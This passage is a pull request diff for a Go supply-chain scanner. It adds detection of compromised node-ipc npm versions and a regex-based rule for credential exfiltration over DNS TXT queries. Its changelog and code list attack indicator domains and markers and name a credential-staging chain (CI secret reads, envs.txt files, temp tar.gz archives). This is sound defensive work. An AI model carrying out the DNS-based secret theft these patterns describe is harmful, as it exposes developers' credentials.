### PR TITLE
feat(jsrisk,incident): node-ipc 2026 compromise detection + DNS TXT exfil chain rule

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,11 @@ Format based on [Keep a Changelog](https://keepachangelog.com/).
 
 ## [Unreleased]
 
+### Added
+
+- `aguara check --ecosystem npm` now flags the May 2026 node-ipc compromise (versions 9.1.6, 9.2.3, 12.0.1; advisory `SOCKET-2026-05-14-node-ipc`). The package-metadata check catches the compromised versions by name and version against an installed `node_modules` tree (which is what `check --ecosystem npm` walks; `scan` itself ignores `node_modules` by default). The historical 2022 RIAEvangelist / "peacenotwar" versions (10.1.1, 10.1.2, 11.0.0, 11.1.0) are tracked as a separate `SOCKET-node-ipc-historical-malicious` entry so the two incidents stay legible.
+- New `jsrisk` rule `JS_DNS_TXT_EXFIL_001`. Detects credential exfiltration via DNS TXT queries. The detector requires a real `resolveTxt` invocation (inline `require('dns').resolveTxt`, a discovered `dns` / `dns/promises` module alias, a `new dns.Resolver()` instance, or a destructured `{ resolveTxt }` import) and at least one further chain signal: CI/cloud secret read, on-disk `envs.txt` credential stage, tar.gz archive staged under `os.tmpdir()`, install-time daemonization, or a known IOC string from the 2026 node-ipc compromise (`bt.node.js`, `sh.azurestaticprovider.net`, `__ntw`, `__ntRun`). Fires HIGH on a single partner; CRITICAL on three-plus partners or a known IOC.
+
 ### Fixed
 
 - `install.sh` extraction now passes `-o` to tar so the install succeeds under hardened container runtimes that drop `CAP_CHOWN` (`--cap-drop ALL`, rootless containers). Without the flag, tar attempted to restore the archive's recorded `uid/gid 1001` and failed with `Cannot change ownership`. POSIX-portable across GNU, BSD, and BusyBox tar.

--- a/Makefile
+++ b/Makefile
@@ -29,6 +29,7 @@ BENCH_ARTIFACTS := aguara-version.txt provenance.json go-test.txt \
 RACE_ARTIFACTS := go-test-race.txt provenance-race.json
 SMOKE_ARTIFACTS := smoke-npm-compromised.json smoke-npm-clean.json \
 	smoke-npm-fixture.json smoke-npm-bare.txt \
+	smoke-npm-node-ipc.json \
 	smoke-supply-chain.json smoke-supply-chain-clean.json
 
 .PHONY: build test lint run clean fmt vet wasm wasm-serve bench \

--- a/benchmarks/smoke-npm-incident.sh
+++ b/benchmarks/smoke-npm-incident.sh
@@ -108,5 +108,29 @@ if /tmp/aguara --no-update-check check --ecosystem npm \
 fi
 ok "bare directory without node_modules errored explicitly"
 
+# --- Case 5: node-ipc 12.0.1 from the May 2026 Socket advisory ---
+case5="$FIX_ROOT/node-ipc-2026"
+mkdir -p "$case5/node_modules/node-ipc"
+printf '{"name":"node-ipc","version":"12.0.1"}\n' \
+  > "$case5/node_modules/node-ipc/package.json"
+
+case5_json="$OUT/smoke-npm-node-ipc.json"
+/tmp/aguara --no-update-check check --ecosystem npm \
+  --path "$case5/node_modules" --format json > "$case5_json"
+
+if ! grep -Eq '"severity":[[:space:]]*"CRITICAL"' "$case5_json"; then
+  cat "$case5_json"
+  fail "node-ipc 12.0.1 must surface as CRITICAL"
+fi
+if ! grep -q '"node-ipc 12.0.1' "$case5_json"; then
+  cat "$case5_json"
+  fail "node-ipc 12.0.1 finding missing exact name/version anchor"
+fi
+if ! grep -q 'SOCKET-2026-05-14-node-ipc' "$case5_json"; then
+  cat "$case5_json"
+  fail "node-ipc 12.0.1 finding missing SOCKET-2026-05-14-node-ipc advisory"
+fi
+ok "node-ipc 12.0.1 flagged CRITICAL with SOCKET-2026-05-14 advisory"
+
 echo
 echo "all npm incident smokes passed"

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -2,14 +2,30 @@
 // that combine into supply-chain risk chains: large obfuscated payloads,
 // detached background execution from install-time code, CI credential
 // harvesting paired with a network or registry sink, OIDC token
-// extraction from runner process memory, and persistence through Claude
-// Code or VS Code workspace automation.
+// extraction from runner process memory, persistence through Claude
+// Code or VS Code workspace automation, and DNS TXT credential exfil
+// (JS_DNS_TXT_EXFIL_001, added for the May 2026 node-ipc compromise).
 //
 // The analyzer is fully offline. It runs at most a single linear pass
 // over the content plus a handful of compiled-once regex matches; it
 // never executes scripts and never deobfuscates dynamically. Findings
 // stay chain-aware: single weak signals (a large file alone, a single
 // CI env reference alone, a child_process call alone) never fire.
+//
+// Limits of the regex-based JS scanner. The DNS TXT detector tracks
+// string-literal interiors, comments, regex literals, template-literal
+// interpolations, fs/os/dns module aliases (require + ESM + combined
+// imports + destructure-with-rename), inline-require chains, and
+// statement boundaries (`;`, ASI newlines, comma-as-separator at top
+// level). It is NOT a full JavaScript parser. Sophisticated obfuscation
+// (dynamic property access through computed names, eval / Function
+// constructor, ASTs reassembled at runtime) can evade the rule. The
+// rule is one signal in a defense-in-depth stack — complement it with
+// the npm metadata check (`aguara check --ecosystem npm`), pinned
+// release scanning, and runtime egress monitoring. Detector accuracy
+// was iterated against the published node-ipc 2026 payload shape and
+// representative malicious-package examples; known limitations are
+// acceptable trade-offs for the deterministic-and-offline guarantee.
 package jsrisk
 
 import (
@@ -33,6 +49,7 @@ const (
 	RuleCISecretHarvest   = "JS_CI_SECRET_HARVEST_001"
 	RuleProcMemOIDC       = "JS_PROC_MEM_OIDC_001"
 	RuleAgentPersistence  = "AGENT_PERSISTENCE_001"
+	RuleDNSTXTExfil       = "JS_DNS_TXT_EXFIL_001"
 )
 
 // Detection thresholds. Chosen to leave room for ordinary minified
@@ -65,7 +82,7 @@ func (a *Analyzer) Analyze(_ context.Context, target *scanner.Target) ([]types.F
 		return nil, nil
 	}
 	m := computeMetrics(target.Content)
-	return detect(target.RelPath, m), nil
+	return detect(target.RelPath, m, target.Content), nil
 }
 
 // --- target gating ---
@@ -158,6 +175,21 @@ type metrics struct {
 	HasVSCodePersistence bool
 	LineAgentPath        int
 	AgentPathMatched     string
+
+	// DNS TXT exfil chain. HasDNSTXTSink is true when the file makes a
+	// real `resolveTxt(...)` call against the Node `dns` module (direct,
+	// alias-from-Resolver, inline require, or imported function). String
+	// mentions of `resolveTxt` outside a call do not count.
+	HasDNSTXTSink bool
+	LineDNSTXT    int
+
+	// HasNodeIPCIOC is true when the file contains literal IOC strings
+	// from the May 2026 node-ipc compromise: the bt.node.js DNS zone,
+	// the sh.azurestaticprovider.net HTTPS endpoint, or the __ntw /
+	// __ntRun runtime markers. Presence escalates the DNS-TXT chain
+	// straight to CRITICAL.
+	HasNodeIPCIOC bool
+	NodeIPCMatch  string
 }
 
 // computeMetrics walks the content once, tracking line numbers and
@@ -348,6 +380,39 @@ func computeMetrics(content []byte) *metrics {
 			if m.LineAgentPath == 0 {
 				m.LineAgentPath = lineOf(content, loc[0])
 				m.AgentPathMatched = ".vscode/tasks.json + runOn: folderOpen"
+			}
+		}
+	}
+
+	// DNS TXT exfil signals. The detector requires a real resolveTxt
+	// invocation; a bare reference to the string "resolveTxt" does not
+	// satisfy any of the regexes here.
+	if line := findDNSTXTSink(content); line > 0 {
+		m.HasDNSTXTSink = true
+		m.LineDNSTXT = line
+	}
+	// Compute string interiors once and reuse for both archive and
+	// envs.txt partner gating. A partner requires its executable
+	// anchor (an fs-write call or an os.tmpdir call) to live in
+	// code, not inside a quoted string in a help message.
+	// contentStringRanges is computed lazily by detectDNSTXTExfil
+	// when it needs to gate partner anchors on executable code.
+	// computeMetrics does not need it because the DNS TXT chain
+	// partners are not surfaced as struct fields.
+
+	// Archive partner: executable os.tmpdir / tmpdir anchor in code,
+	// Archive and envs.txt partner scans are NOT performed here.
+	// Both partners are recomputed inside detectDNSTXTExfil from
+	// comment-stripped content, with the same alias-binding gates,
+	// so computing them in computeMetrics would be wasted work on
+	// every JavaScript file (large minified bundles especially).
+	// detectDNSTXTExfil only runs when HasDNSTXTSink is true; the
+	// recomputation cost is amortized over actual chain candidates.
+	for _, n := range nodeIPCIOCNeedles {
+		if bytes.Contains(content, []byte(n)) {
+			m.HasNodeIPCIOC = true
+			if m.NodeIPCMatch == "" {
+				m.NodeIPCMatch = n
 			}
 		}
 	}
@@ -818,9 +883,717 @@ var agentPersistenceNeedles = []string{
 // (see detection below); this token does not fire on its own.
 var runOnFolderOpenRe = regexp.MustCompile(`(?i)["']?runOn["']?\s*:\s*["']folderOpen["']`)
 
+// --- DNS TXT exfil regexes ---
+//
+// The DNS TXT exfil detector deliberately requires a real `resolveTxt`
+// call. A bare reference to the string "resolveTxt" (in a comment, a
+// JSON manifest, a documentation example) does not satisfy any of the
+// regexes below. Legitimate libraries that perform DNS TXT lookups
+// would match, so the analyzer only fires the rule when at least one
+// other chain signal (secret read, archive staging, daemon chain, or
+// a known node-ipc IOC needle) accompanies the call.
+
+// dnsInlineRequireResolveTxtRe matches inline-require resolveTxt
+// calls against the Node dns module, in all the documented shapes:
+//
+//	require('dns').resolveTxt(name, cb)
+//	require('node:dns').promises.resolveTxt(name)
+//	require("dns/promises").resolveTxt(name)
+//	require('dns')['resolveTxt']('zone')         (bracket access)
+//	require('dns')?.resolveTxt(...)              (optional chain)
+//	require('dns')?.['resolveTxt'](...)
+//	require('dns').promises['resolveTxt'](...)
+//
+// Submatch 1 captures the `require` token so the caller can check
+// its position against string interiors. The leading
+// jsIdentBoundary prevents matching `myrequire(...)`.
+var dnsInlineRequireResolveTxtRe = regexp.MustCompile(
+	jsIdentBoundary + `(require)\s*\(\s*['"](?:node:)?dns(?:/promises)?['"]\s*\)` +
+		// optional `.promises` / `?.promises` middle step
+		`(?:\s*(?:\?\s*\.|\.)\s*promises)?` +
+		// access to resolveTxt: dot, optional chain, or bracket
+		`\s*(?:` +
+		`(?:\?\s*\.|\.)\s*resolveTxt` +
+		`|` +
+		`(?:\?\s*\.\s*)?\[\s*['"` + "`" + `]resolveTxt['"` + "`" + `]\s*\]` +
+		`)` +
+		// optional `?.` before the call site
+		`\s*(?:\?\s*\.\s*)?\(`,
+)
+
+// dnsAliasAssignRe captures the local variable bound to the dns module:
+//
+//	const dns = require('dns')
+//	const dnsP = require('node:dns/promises')
+//
+// Submatch 1 is the local name. The caller then looks for
+// `<name>.resolveTxt(` calls in the file.
+var dnsAliasAssignRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?dns(?:/promises)?['"]\s*\)`,
+)
+
+// dnsAliasESMRe captures the local variable bound via ESM import:
+//
+//	import dns from 'dns'
+//	import * as dns from 'node:dns'
+//	import dnsP from 'dns/promises'
+//	import dns, * as dnsP from 'dns'   (captures dnsP via the
+//	                                    namespace clause)
+//
+// Submatch 1 is the local name. The optional default+comma prefix
+// covers combined imports; the dnsAliasESMCombinedRe further down
+// captures the default identifier from those same statements.
+var dnsAliasESMRe = regexp.MustCompile(
+	`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?dns(?:/promises)?['"]`,
+)
+
+// dnsAliasESMCombinedRe handles the combined ESM import form, where a
+// default identifier is followed by a comma and EITHER a namespace
+// import OR a brace-destructure:
+//
+//	import dns, * as dnsP from 'dns'
+//	import dns, { Resolver } from 'node:dns'
+//	import dnsP, { resolveTxt } from 'dns/promises'
+//
+// The previous single-clause regex stops at the first `,` so the
+// default identifier never registers. Submatch 1 is the default
+// import name; the trailing clause is intentionally not captured
+// here because the existing dnsAliasESMRe / destructure regexes
+// will also match that same import statement and pick up the
+// namespace / destructured names separately.
+var dnsAliasESMCombinedRe = regexp.MustCompile(
+	`import\s+([A-Za-z_$][\w$]*)\s*,\s*(?:\*\s+as\s+[A-Za-z_$][\w$]*|\{[^}]+\})\s+from\s*['"](?:node:)?dns(?:/promises)?['"]`,
+)
+
+// dnsPromisesCJSDestructureRe captures the FULL brace body of a CJS
+// destructure of the dns module, regardless of how many members are
+// listed. The caller parses the body looking for `promises` (bare or
+// renamed) AND for `Resolver` (so destructured Resolver constructors
+// from both `dns` and `dns/promises` are picked up). Submatch 1 is
+// the brace body.
+var dnsPromisesCJSDestructureRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?dns(?:/promises)?['"]\s*\)`,
+)
+
+// dnsPromisesESMDestructureRe is the ESM equivalent: the brace body
+// of `import { ... } from 'dns'` or `'dns/promises'`, with optional
+// leading default import for the combined form.
+var dnsPromisesESMDestructureRe = regexp.MustCompile(
+	`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?\{\s*([^}]+)\s*\}\s*from\s*['"](?:node:)?dns(?:/promises)?['"]`,
+)
+
+// parseDestructuredResolverAlias walks a destructure brace body and
+// returns the local binding name for the `Resolver` member, plus a
+// boolean indicating whether the member is present. Same shape as
+// parseDestructuredPromisesAlias but for the Resolver constructor.
+//
+// Recognized forms (the brace body is the same; `as` is ESM-only):
+//
+//	Resolver
+//	Resolver : alias        (CJS rename)
+//	Resolver as alias       (ESM rename)
+func parseDestructuredResolverAlias(body string, esm bool) (string, bool) {
+	for _, raw := range strings.Split(body, ",") {
+		entry := strings.TrimSpace(raw)
+		if entry == "" {
+			continue
+		}
+		if idx := strings.Index(entry, ":"); idx >= 0 {
+			source := strings.TrimSpace(entry[:idx])
+			local := strings.TrimSpace(entry[idx+1:])
+			if source == "Resolver" && local != "" {
+				return local, true
+			}
+			continue
+		}
+		if esm {
+			if idx := strings.Index(entry, " as "); idx >= 0 {
+				source := strings.TrimSpace(entry[:idx])
+				local := strings.TrimSpace(entry[idx+len(" as "):])
+				if source == "Resolver" && local != "" {
+					return local, true
+				}
+				continue
+			}
+		}
+		if entry == "Resolver" {
+			return "Resolver", true
+		}
+	}
+	return "", false
+}
+
+// newInstanceAssignRe captures the local variable bound to a
+// `new <constructor>(...)` instance:
+//
+//	const r = new Resolver()
+//	let res = new MyResolver(opts)
+//
+// Submatch 1 is the local name, submatch 2 is the constructor name.
+// Used together with the destructured-Resolver alias set to register
+// receivers for resolveTxt calls when the Resolver itself was
+// destructured from the dns module.
+var newInstanceAssignRe = regexp.MustCompile(
+	`(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*new\s+([A-Za-z_$][\w$]*)\s*\(`,
+)
+
+// parseDestructuredPromisesAlias walks a destructure brace body and
+// returns the local binding name for the `promises` member, plus a
+// boolean indicating whether the member is present at all.
+//
+// Recognized CJS forms:
+//
+//	promises
+//	promises : alias
+//
+// Recognized ESM forms (the brace body is the same; the `as`
+// alternative is ESM-only):
+//
+//	promises
+//	promises as alias
+//
+// Siblings in the brace body (e.g. `Resolver`, `lookup`) are ignored.
+func parseDestructuredPromisesAlias(body string, esm bool) (string, bool) {
+	for _, raw := range strings.Split(body, ",") {
+		entry := strings.TrimSpace(raw)
+		if entry == "" {
+			continue
+		}
+		// CJS rename: `promises : alias`
+		if idx := strings.Index(entry, ":"); idx >= 0 {
+			source := strings.TrimSpace(entry[:idx])
+			local := strings.TrimSpace(entry[idx+1:])
+			if source == "promises" && local != "" {
+				return local, true
+			}
+			continue
+		}
+		// ESM rename: `promises as alias`
+		if esm {
+			if idx := strings.Index(entry, " as "); idx >= 0 {
+				source := strings.TrimSpace(entry[:idx])
+				local := strings.TrimSpace(entry[idx+len(" as "):])
+				if source == "promises" && local != "" {
+					return local, true
+				}
+				continue
+			}
+		}
+		// Bare member: `promises`
+		if entry == "promises" {
+			return "promises", true
+		}
+	}
+	return "", false
+}
+
+// dnsResolverAliasReceiverRe captures `new <alias>.Resolver(...)` or
+// `new <alias>.promises.Resolver(...)` where <alias> is a separate
+// identifier (a dns module binding). The caller verifies <alias>
+// belongs to the dns-alias set before treating the instance as a
+// real Resolver receiver; without that check, `new someSdk.Resolver()`
+// from an unrelated library would be misread as a Node DNS resolver.
+//
+// Submatch 1 is the local variable (the new instance); submatch 2
+// is the alias the Resolver is constructed against. The optional
+// `.promises` segment lets `new dns.promises.Resolver()` register
+// when `dns` is a confirmed binding.
+var dnsResolverAliasReceiverRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*new\s+([A-Za-z_$][\w$]*)\s*(?:\.\s*promises\s*)?\.\s*Resolver\s*\(`,
+)
+
+// dnsResolverInlineRequireRe captures the inline-require form
+// `const r = new (require('dns').Resolver)()` and the promises
+// equivalent `new (require('dns').promises.Resolver)()`.
+// Submatch 1 is the local variable name.
+var dnsResolverInlineRequireRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*new\s+\(\s*require\s*\(\s*['"](?:node:)?dns(?:/promises)?['"]\s*\)(?:\s*\.\s*promises)?\s*\.\s*Resolver\s*\)\s*\(`,
+)
+
+// dnsResolveTxtDestructureRe matches destructured `resolveTxt` imports
+// from the dns module, with or without an alias:
+//
+//	const { resolveTxt } = require('dns').promises
+//	const { resolveTxt: lookup } = require('node:dns/promises')
+//	import { resolveTxt } from 'dns/promises'
+//
+// Submatch 1 is the brace body. The caller parses each entry and, if
+// the source name (everything before `:`) is `resolveTxt`, records the
+// effective local binding (the part after `:`, or the name itself).
+var dnsResolveTxtDestructureRe = regexp.MustCompile(
+	`(?:` +
+		`(?:(?:const|let|var)\s+|,\s*)\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?dns(?:/promises)?['"]\s*\)(?:\s*\.\s*promises)?` +
+		`|` +
+		`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?\{\s*([^}]+)\s*\}\s*from\s*['"](?:node:)?dns(?:/promises)?['"]` +
+		`)`,
+)
+
+// dnsResolveTxtFromAliasRe captures destructures whose right-hand
+// side is a previously-bound dns alias (or its `.promises` sub-
+// namespace), e.g. `const { resolveTxt } = dns.promises`. Submatch
+// 1 is the brace body; submatch 2 is the alias on the RHS. The
+// caller verifies the alias against the dns-binding set, then
+// parses the body looking for `resolveTxt` (bare or renamed).
+var dnsResolveTxtFromAliasRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)\{\s*([^}]+)\s*\}\s*=\s*([A-Za-z_$][\w$]*)(?:\s*\.\s*promises)?`,
+)
+
+// identifierResolveTxtCallRe captures the documented shapes of
+// `<identifier>(.promises)?(.resolveTxt|['resolveTxt'])(?.)(`:
+//
+//	dns.resolveTxt(...)
+//	dns?.resolveTxt(...)
+//	dns.resolveTxt?.(...)
+//	dns?.resolveTxt?.(...)
+//	dns.promises.resolveTxt(...)
+//	dns['resolveTxt'](...)
+//	dns[`resolveTxt`](...)
+//
+// The caller filters submatch 1 (the receiver identifier) through
+// the discovered dns / Resolver alias set so unrelated objects do
+// not satisfy the receiver match.
+var identifierResolveTxtCallRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)` +
+		// optional `.promises` / `?.promises` middle step
+		`(?:\s*(?:\?\s*\.|\.)\s*promises)?` +
+		// access to resolveTxt: dot, optional chain, or bracket
+		// (bracket access may itself be preceded by an optional
+		// chain marker `?.`).
+		`\s*(?:` +
+		`(?:\?\s*\.|\.)\s*resolveTxt` +
+		`|` +
+		`(?:\?\s*\.\s*)?\[\s*['"` + "`" + `]resolveTxt['"` + "`" + `]\s*\]` +
+		`)` +
+		// optional `?.` before the call site
+		`\s*(?:\?\s*\.\s*)?\(`,
+)
+
+// bareResolveTxtCallRe captures `resolveTxt(...)` invoked directly on a
+// name that was destructured from the dns module.
+var bareResolveTxtCallRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\(`,
+)
+
+// --- DNS TXT exfil supporting signals ---
+
+// archiveTmpReceiverRe captures `<receiver>.tmpdir(` calls with the
+// receiver name in submatch 1. The caller verifies that <receiver>
+// is a binding of the Node os module (via collectOsBindings) before
+// crediting the call as a real os.tmpdir() anchor. The leading
+// jsIdentBoundary prevents matching the suffix of a longer property
+// chain such as `wrapper.os.tmpdir()`.
+var archiveTmpReceiverRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*tmpdir\s*\(`,
+)
+
+// archiveTmpBareCallRe captures a bare `<name>(` invocation with
+// the name in submatch 1, preceded by a non-identifier/non-`.`
+// boundary so a method call on an unrelated object does not match.
+// The caller verifies that <name> was destructured from the os
+// module before crediting the call.
+var archiveTmpBareCallRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\(`,
+)
+
+// archiveTokenRe matches a tar.gz / gzip / nt-prefixed archive
+// reference. These are usually quoted; the proximity check pairs
+// the token with an executable archiveTmpAnchorRe match within
+// 160 bytes.
+var archiveTokenRe = regexp.MustCompile(`tar\.gz|\.gzip\b|\bnt-`)
+
+// Comment masking is implemented as a string-and-regex-aware byte
+// walker in stripJSCommentsPreservingOffsets rather than naive regex
+// passes. Regex-based strips blank the `//` inside ordinary URL
+// literals such as `https://example.com` (preserved by string state
+// tracking) and also inside JS regex literals such as `/https?:\/\//`
+// (preserved by regex state tracking).
+//
+// jsRegexLiteralStartingChars lists the characters that, when they
+// are the most recent non-whitespace token before a `/`, indicate
+// the `/` opens a regex literal rather than a division operator.
+// Plus a small set of keywords handled separately in
+// couldBeRegexStart. The list is conservative — it accepts as
+// "regex context" anything that cannot be the left operand of a
+// division. A few rare ambiguous cases (e.g. `++ / pattern /`) are
+// treated as division; in practice that only matters when a payload
+// uses such forms deliberately to evade comment stripping.
+var jsRegexLiteralStartingChars = map[byte]bool{
+	'=': true, '(': true, '[': true, '{': true, ',': true, ';': true,
+	':': true, '?': true, '!': true, '|': true, '&': true, '^': true,
+	'~': true, '+': true, '-': true, '*': true, '%': true, '<': true,
+	'>': true, '\n': true,
+}
+
+// couldBeRegexStart returns true when the `/` at position i is the
+// start of a regex literal. The classifier walks back over
+// whitespace to the most recent non-whitespace token and checks it
+// against the punctuation set above; otherwise it walks the trailing
+// identifier and checks the set of keywords that can precede a
+// regex literal (`return`, `typeof`, etc.).
+func couldBeRegexStart(content []byte, i int) bool {
+	j := i - 1
+	for j >= 0 {
+		c := content[j]
+		if c == ' ' || c == '\t' || c == '\r' {
+			j--
+			continue
+		}
+		break
+	}
+	if j < 0 {
+		return true
+	}
+	c := content[j]
+	if jsRegexLiteralStartingChars[c] {
+		return true
+	}
+	// `)` preceding the `/` can be either:
+	//   - the closing of a function call: `f() / x` is division;
+	//   - the closing of a control-flow header: `if (x) /regex/`
+	//     is a regex literal. Walk back to the matching `(` and
+	//     inspect the keyword before it. `if`, `while`, `for`,
+	//     `switch`, `catch` signal control-flow.
+	if c == ')' {
+		depth := 1
+		k := j - 1
+		for k >= 0 && depth > 0 {
+			switch content[k] {
+			case ')':
+				depth++
+			case '(':
+				depth--
+			}
+			k--
+		}
+		if depth != 0 {
+			return false
+		}
+		// k now points one before the matching `(`.
+		// Skip whitespace back to the preceding token.
+		for k >= 0 {
+			cc := content[k]
+			if cc == ' ' || cc == '\t' || cc == '\r' || cc == '\n' {
+				k--
+				continue
+			}
+			break
+		}
+		if k < 0 {
+			return false
+		}
+		end := k + 1
+		for k >= 0 {
+			cc := content[k]
+			if (cc >= 'a' && cc <= 'z') || (cc >= 'A' && cc <= 'Z') ||
+				cc == '_' || (cc >= '0' && cc <= '9') || cc == '$' {
+				k--
+				continue
+			}
+			break
+		}
+		switch string(content[k+1 : end]) {
+		case "if", "while", "for", "switch", "catch":
+			return true
+		}
+		return false
+	}
+	// Identifier / keyword preceding the `/`. Walk back over
+	// identifier characters and check against a small list of
+	// keywords whose syntactic position can precede a regex literal.
+	if (c < 'a' || c > 'z') && (c < 'A' || c > 'Z') &&
+		c != '_' && (c < '0' || c > '9') && c != '$' {
+		return false
+	}
+	end := j + 1
+	for j >= 0 {
+		c := content[j]
+		if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
+			c == '_' || (c >= '0' && c <= '9') || c == '$' {
+			j--
+			continue
+		}
+		break
+	}
+	switch string(content[j+1 : end]) {
+	case "return", "typeof", "instanceof", "in", "delete",
+		"void", "new", "throw", "yield", "await", "case", "do":
+		return true
+	}
+	return false
+}
+
+// envsTxtTokenRe matches an `envs.txt` filename reference. The
+// filename boundary accepts the three quote families (`'`, `"`, and
+// backtick) plus a forward / back path separator so a template-
+// literal path like `${os.tmpdir()}/envs.txt` matches alongside the
+// simple string forms.
+var envsTxtTokenRe = regexp.MustCompile("['\"`/\\\\]envs\\.txt(?:['\"`]|\\b)")
+
+// fsWriteReceiverRe captures `<receiver>.<write-method>(` calls
+// with the receiver and method names in submatches 1 and 2. The
+// caller verifies that <receiver> is a binding of the Node fs
+// module (or fs-extra) via collectFsBindings before crediting the
+// call as a real staging anchor. The set of write methods is
+// reused by fsWriteBareCallRe. The leading jsIdentBoundary
+// prevents matching the suffix of a longer chain such as
+// `wrapper.fs.writeFileSync(...)`.
+var fsWriteReceiverRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*(writeFile(?:Sync)?|appendFile(?:Sync)?|writeSync|outputFile(?:Sync)?)\s*\(`,
+)
+
+// fsPromisesWriteReceiverRe captures the promises sub-namespace
+// shape: `<alias>.promises.<write-method>(`. Submatch 1 is the
+// receiver alias (must be a verified fs binding); submatch 2 is
+// the method name.
+var fsPromisesWriteReceiverRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*promises\s*\.\s*(writeFile(?:Sync)?|appendFile(?:Sync)?|writeSync|outputFile(?:Sync)?)\s*\(`,
+)
+
+// fsWriteBareCallRe captures any bare `<name>(` invocation with the
+// name in submatch 1. The caller verifies that <name> was
+// destructured from the fs module AND that its source member is
+// one of the fs write methods. This shape covers both literal
+// destructures (`const { writeFileSync } = ...`) and renamed ones
+// (`const { writeFileSync: w } = ...`).
+var fsWriteBareCallRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\(`,
+)
+
+// fsWriteMethodNames is the canonical list of fs write method names
+// accepted as staging anchors. Kept in sync with the regexes above.
+var fsWriteMethodNames = map[string]bool{
+	"writeFile":     true,
+	"writeFileSync": true,
+	"appendFile":    true,
+	"appendFileSync": true,
+	"writeSync":     true,
+	"outputFile":    true,
+	"outputFileSync": true,
+}
+
+// moduleBindings collects the local names bound to a Node core
+// module and the local names that were destructured FROM that
+// module. The archive and envs.txt partner checks consult these
+// sets so an unrelated `config.tmpdir()` or local `writeFileSync`
+// helper does not falsely satisfy a chain partner.
+//
+// sourceByLocal maps each destructured local back to its source
+// member name (`{ tmpdir: t } = require('os')` -> sourceByLocal["t"]
+// = "tmpdir"). For unrenamed destructures the local equals the
+// source. The caller uses this map to verify that a bare call
+// originates from a specific module member (e.g. `t()` qualifies
+// as os.tmpdir when sourceByLocal["t"] == "tmpdir").
+type moduleBindings struct {
+	aliases       map[string]bool   // identifiers bound to the module itself
+	names         map[string]bool   // identifiers destructured from the module
+	sourceByLocal map[string]string // local name -> source member name
+}
+
+func newModuleBindings() moduleBindings {
+	return moduleBindings{
+		aliases:       map[string]bool{},
+		names:         map[string]bool{},
+		sourceByLocal: map[string]string{},
+	}
+}
+
+// osModuleAliasRe / osModuleAliasESMRe / osDestructureRe /
+// osDestructureESMRe mirror the dns binding regexes for the Node
+// `os` module. ESM combined-import shape `import os, { tmpdir }
+// from 'os'` is covered by accepting an optional `<id>,` prefix in
+// each ESM clause.
+var osModuleAliasRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?os['"]\s*\)`,
+)
+var osModuleAliasESMRe = regexp.MustCompile(
+	`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?os['"]`,
+)
+
+// osModuleAliasESMCombinedRe captures the DEFAULT alias in
+// combined ESM imports of the os module:
+//   import os, { platform } from 'os'
+//   import os, * as osNs from 'os'
+// Submatch 1 is the default identifier. The trailing clause is
+// captured separately by osModuleAliasESMRe and osDestructureESMRe.
+var osModuleAliasESMCombinedRe = regexp.MustCompile(
+	`import\s+([A-Za-z_$][\w$]*)\s*,\s*(?:\*\s+as\s+[A-Za-z_$][\w$]*|\{[^}]+\})\s+from\s*['"](?:node:)?os['"]`,
+)
+var osDestructureRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?os['"]\s*\)`,
+)
+var osDestructureESMRe = regexp.MustCompile(
+	`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?\{\s*([^}]+)\s*\}\s*from\s*['"](?:node:)?os['"]`,
+)
+
+// fs-equivalent regexes. fs-extra is included because it is a
+// drop-in replacement that exposes the same write API surface; fs/
+// promises is also included for the same reason. The caller treats
+// any of these as fs for the staging partner check.
+var fsModuleAliasRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]\s*\)`,
+)
+var fsModuleAliasESMRe = regexp.MustCompile(
+	`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]`,
+)
+
+// fsModuleAliasESMCombinedRe captures the DEFAULT alias in combined
+// ESM imports of the fs / fs-extra / fs/promises modules:
+//   import fs, { writeFileSync } from 'fs'
+var fsModuleAliasESMCombinedRe = regexp.MustCompile(
